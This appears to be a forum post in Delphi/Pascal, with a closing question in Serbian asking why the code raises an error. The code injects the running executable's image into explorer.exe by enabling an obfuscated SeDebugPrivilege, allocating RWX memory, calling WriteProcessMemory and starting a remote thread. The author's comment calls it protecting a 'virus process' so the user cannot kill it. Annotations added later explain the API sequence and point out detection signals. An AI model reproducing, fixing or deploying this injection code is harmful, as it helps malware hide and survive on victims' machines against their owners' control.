// Thread start routine meant to be executed inside the target process
// (the author's note: this is the procedure to be written into explorer.exe's
// memory). It is only a stub here: the parameter is ignored and 0 is returned.
//   p : thread parameter passed by CreateRemoteThread (unused)
//   returns 0 as the thread exit code
function DefendProcess(p : pointer) : LongWord; stdcall;
begin
  // Classic Pascal form of setting the return value.
  DefendProcess := 0;
end;
// Get debug privileges
// Enables one privilege on the current process token. The privilege name is
// kept XOR-obfuscated in SE_DEBUG_NAME and decoded at runtime by _xor (defined
// elsewhere in this unit); judging by the constant's name and its 16-character
// length it presumably decodes to SeDebugPrivilege -- not verifiable here.
// Defender note: a string-obfuscated privilege name followed by token privilege
// adjustment is itself a detection signal (token-adjust auditing / EDR telemetry).
procedure GetDebugPrivs;
const
// Obfuscated; passed through _xor before LookupPrivilegeValue.
SE_DEBUG_NAME = 'Wa@afqcTvmrmhaca';
var
hToken : THandle;        // current process token; never closed (handle leak)
tkp : TTokenPrivileges;  // single-entry privilege array given to AdjustTokenPrivileges
retval : DWORD;          // ReturnLength out-param of AdjustTokenPrivileges; not inspected
begin
If OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken) Then
Begin
// Return values of LookupPrivilegeValue and AdjustTokenPrivileges are ignored,
// so the routine cannot tell the caller whether the privilege was actually enabled.
LookupPrivilegeValue(nil, PAnsiChar(_xor(SE_DEBUG_NAME)), tkp.Privileges[0].Luid);
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, tkp, 0, nil, retval);
End;
end;
// Copies SizeOfImage bytes starting at Module from the calling process into
// hProcess at the same address, one $1000-byte page at a time, after
// re-mapping that range in the target as PAGE_EXECUTE_READWRITE.
//   hProcess    : handle to the target process (opened by the caller)
//   Module      : base address to free/re-allocate in the target and copy from locally
//   SizeOfImage : number of bytes to allocate in the target
// No API return value is checked. Pointer arithmetic goes through LongWord,
// so this is 32-bit-only code.
// Defender note: VirtualFreeEx + VirtualAllocEx(RWX) + VirtualProtectEx +
// WriteProcessMemory against another process is a textbook code-injection
// sequence; these cross-process calls are the point where memory-scanning and
// EDR hooks detect and block it.
procedure WriteImage(hProcess: THandle; Module: Pointer; SizeOfImage: DWORD);
var
pMem: Pointer;                    // cursor over regions of the remote allocation
NumBytes, dwOldProt, i: longword; // WriteProcessMemory / VirtualProtectEx out-params; page offset
mbi: TMemoryBasicInformation;     // region descriptor returned by VirtualQueryEx
ptr: Pointer;                     // current page; used as both local source and remote destination
begin
// Drop whatever is mapped at Module in the target, then re-reserve and commit it RWX.
VirtualFreeEx(hProcess, Module, 0, MEM_RELEASE);
pMem := VirtualAllocEx(hProcess, Module, SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
VirtualQueryEx(hProcess, pMem, mbi ,sizeof(TMemoryBasicInformation));
// Walk consecutive regions until a PAGE_NOACCESS region or a zero-size region is reached.
While (mbi.Protect <> PAGE_NOACCESS) and (mbi.RegionSize <> 0) Do
Begin
// Note: compares Protect for equality with PAGE_GUARD; PAGE_GUARD is a modifier
// flag that is normally combined with a base protection value.
If (mbi.Protect <> PAGE_GUARD) Then
Begin
i := 0;
// Page loop: $1000 bytes per step; RegionSize is assumed to be page-aligned.
While (i < mbi.RegionSize) Do
Begin
ptr := Pointer(LongWord(pMem) + i);
VirtualProtectEx(hProcess, ptr, $1000, PAGE_EXECUTE_READWRITE, dwOldProt);
// Source and destination buffers are the same address value: the local page
// at ptr is copied into the target's page at ptr.
WriteProcessMemory(hProcess, ptr, ptr, $1000, NumBytes);
i := i + $1000;
end;
end;
// Advance to the next region and re-query it.
pMem := Pointer(LongWord(pMem) + mbi.RegionSize);
VirtualQueryEx(hProcess, pMem, mbi, sizeof(TMemoryBasicInformation));
end;
end;
// Protect virus process, so user cannot kill it
// Entry point of the self-protection routine. Locates the process that owns
// the 'Progman' desktop window (normally explorer.exe, as the author's comments
// state), opens it with PROCESS_ALL_ACCESS, copies this executable's image into
// it with WriteImage and starts DefendProcess there with CreateRemoteThread.
// No return value (FindWindow, OpenProcess, CreateRemoteThread) is checked.
// Defender note: SeDebugPrivilege enablement, OpenProcess(PROCESS_ALL_ACCESS)
// on the shell process, WriteProcessMemory and CreateRemoteThread issued by a
// non-system binary are a high-confidence injection indicator (e.g. Sysmon
// event 8 / EDR remote-thread telemetry); explorer.exe should never receive
// remote threads from user-level executables.
procedure ProtectProcess;
var
hProcess : Cardinal;    // handle to the target process
ProcessId : Integer;    // PID filled in by GetWindowThreadProcessId
Module : pointer;       // base address of this executable (GetModuleHandle(nil))
SizeOfImage : LongWord; // SizeOfImage field of this image's PE optional header
begin
GetDebugPrivs;
// PID of the owner of the 'Progman' window; a nil window handle is not detected here.
GetWindowThreadProcessId(FindWindow('Progman', nil), @ProcessId);
hProcess := OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
Module := Pointer(GetModuleHandle(nil));
// DOS header -> e_lfanew -> skip PE signature (DWORD) and file header -> optional header.
SizeOfImage := PImageOptionalHeader(Pointer(Integer(Module) +
PImageDosHeader(Module)._lfanew +
SizeOf(DWORD) +
SizeOf(TImageFileHeader))).SizeOfImage;
WriteImage(hProcess, Module, SizeOfImage);
// ThreadID is not declared in this procedure; presumably a unit-level variable -- verify.
CreateRemoteThread(hProcess, nil, 0, @DefendProcess, Module, 0, ThreadID);
CloseHandle(hProcess);
end;
Jos jednom, ovaj kod je skoro ISTI kao i onaj koji sam nasao na net-u, ali ovde prijavljuje gresku... (a kad iskompajliram onaj od net-a, ne)... Izmenio sam samo nacin nalazenja explorer.exe PID-a (ja preko FindWindow, a onaj kod sa net-a preko listanja svih procesa itd...)
Ima li neko neki predlog ?